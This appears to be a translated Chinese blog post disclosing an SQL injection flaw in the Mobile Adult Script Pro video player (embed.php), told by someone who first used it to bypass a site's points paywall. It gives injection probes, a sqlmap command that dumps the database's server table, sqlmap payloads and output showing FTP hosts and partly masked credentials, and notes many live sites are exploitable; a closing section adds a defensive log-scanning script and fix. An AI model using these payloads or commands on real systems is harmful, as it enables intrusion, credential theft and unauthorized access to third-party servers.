
Generic SQL injection vulnerability in a foreign adult website system

Source: 自学PHP网    Time: 2015-04-16 23:15


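Testing shows that this version has the SQL injection vulnerability in every case, but the site software has to be purchased, so the version number is not known. Reading the server table in the database yields the FTP address together with the username and password.

It started because a certain domestic "gentleman" site requires points to watch its "study" videos, so I located the video player page, which made it possible to bypass the points restriction. Later I tested it and found that 1=2 produces an error, and sqlmap dumped the database without any trouble. After that, when I opened the site on my phone, I noticed the title was different from the one shown on a computer: it displayed Mobile Adult Script Pro. That is obviously an off-the-shelf product, so I googled it, reached the official site, and found that the vulnerability can be reproduced in the demo the official site provides.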
http://www.adultscriptpro.com/demo.html
 
 
Googling the title turns up quite a few sites that use this software; some need the path adjusted, but basically all of them can be handled.
 
http://www.xxx.com/modules/video/player/nuevo/embed.php?id=2806 and 1=1

 
http://www.xxx.com/modules/video/player/nuevo/embed.php?id=2806 and 1=2
 
python sqlmap.py -u http://www.xxx.xxx/modules/video/player/nuevo/embed.php?id=2806 --dump -T server -D xxx -v 0
 
 
 
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2806 AND 6581=6581

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=2806 AND (SELECT 7265 FROM(SELECT COUNT(*),CONCAT(0x716e6a6471,(SELECT (CASE WHEN (7265=7265) THEN 1 ELSE 0 END)),0x716b767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=2806 AND SLEEP(5)
---
web application technology: PHP 5.4.26
back-end DBMS: MySQL 5.0
Database: ***
Table: server
[1 entry]
+-----------+--------------+---------+--------+----------+----------+----------------+---------------------+----------------+--------------------------------+----------------------+--------------+--------------+--------------+-----------------+------------------+------------------+----------------------+
| server_id | total_videos | url     | status | ftp_port | ftp_root | ftp_host       | last_used           | server_name    | rtmp_stream                    | lighttpd_url         | ftp_username | lighttpd_key | ftp_password | lighttpd_prefix | streaming_server | streaming_method | lighttpd_secdownload |
+-----------+--------------+---------+--------+----------+----------+----------------+---------------------+----------------+--------------------------------+----------------------+--------------+--------------+--------------+-----------------+------------------+------------------+----------------------+
| 2         | 2974         | <blank> | 1      | 21       | /        | 16手.21动.5打.21码 | 2014-06-24 09:35:14 | 16手.21动.5打.21码 | rtmp://16手.21动.5打.21码:1935/vod | http://www.xxx.com | ***         | P4ss#w0rD    | zx*****121   | /stream/        | apache           | rtmp             | 0                    |
+-----------+--------------+---------+--------+----------+----------+----------------+---------------------+----------------+--------------------------------+----------------------+--------------+--------------+--------------+-----------------+------------------+------------------+----------------------+
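
For operators of sites running this software, the three payload families in the sqlmap output above are easy to spot in web server access logs, because a legitimate id value for embed.php is always a bare integer. The following Python code is an added example, not part of the original post or of the vendor's code; it assumes a combined-format access log, and the log lines, client addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines for illustration (placeholder client addresses).
SAMPLE_LOG = [
    '203.0.113.5 - - [16/Apr/2015:23:01:02 +0800] "GET /modules/video/player/nuevo/embed.php?id=2806 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [16/Apr/2015:23:01:10 +0800] "GET /modules/video/player/nuevo/embed.php?id=2806%20AND%206581=6581 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [16/Apr/2015:23:01:11 +0800] "GET /video/embed.php?id=2806%20AND%20SLEEP(5) HTTP/1.1" 200 5120',
    '198.51.100.7 - - [16/Apr/2015:23:01:17 +0800] "GET /modules/video/player/nuevo/embed.php?id=2806%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),FLOOR(RAND(0)*2)x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a) HTTP/1.1" 200 310',
    '203.0.113.5 - - [16/Apr/2015:23:02:00 +0800] "GET /index.php?id=abc HTTP/1.1" 200 900',
]

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
RULES = [  # checked in order; patterns mirror the payloads in the sqlmap report
    ("time-based blind", re.compile(r"\bsleep\s*\(", re.I)),
    ("error-based", re.compile(r"floor\s*\(\s*rand\s*\(", re.I)),
    ("boolean-based blind", re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I)),
]

def classify_id(value):
    """Return None for a plain numeric id, else a label for the anomaly."""
    if re.fullmatch(r"\d+", value):
        return None
    for label, pattern in RULES:
        if pattern.search(value):
            return label
    return "non-numeric id"

def scan(lines):
    """Return (client, label, decoded id) for suspicious embed.php requests."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/embed.php"):  # install path varies per site
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            label = classify_id(value)
            if label:
                findings.append((client, label, value))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule is the fix on the application side: reject or cast any id that is not purely numeric before it reaches the query, and bind it as a parameter.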

 

